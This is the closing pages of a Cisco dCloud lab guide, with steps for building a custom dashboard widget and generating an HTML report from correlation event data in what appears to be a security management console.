Figure 64. Create Dashboard

7. On the new dashboard, click Add Widget.

Figure 65. Add Widget

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 50 of 54
Cisco dCloud

8. Select Custom Analysis. This very flexible widget will allow us to display data from any table with lots of customization.

Figure 66. Custom Analysis

9. Customize the new widget by first clicking top left corner, then adjusting first the Table (as an example, pick the correlation
events, then pick which field you want to display, or any search criteria.

NOTE: It is for example very easy to show users in quarantine, or users with high number of NXdomain responses etc, depending
on the correlation policy.

Figure 67. Customizing a Widget

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 51 of 54
Cisco dCloud

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 52 of 54
Cisco dCloud

10. You can convert your (customized) dashboard into a Report template. Click Report Designer on the top right of Dashboard.

Figure 68. Report Designer

11. This bring you to the Report Template design, which starts with your current dashboard structure but where you can still
modify reports, adding text, logotype, changing between bar, pie-charts graphs etc.

12. When you have finished, click Save and Generate your report.

Figure 69. Save Report Template

13. When generating the report, make sure to select HTML output (there is no PDF reader).

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 53 of 54
Cisco dCloud

Figure 70. Select HTML Output

14. View the report by clicking the HTML zip.

Conclusion

This concludes the Reporting exercise. To summarize:

We learned how to produce and customize reports.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 54 of 54

Vous aimerez peut-être aussi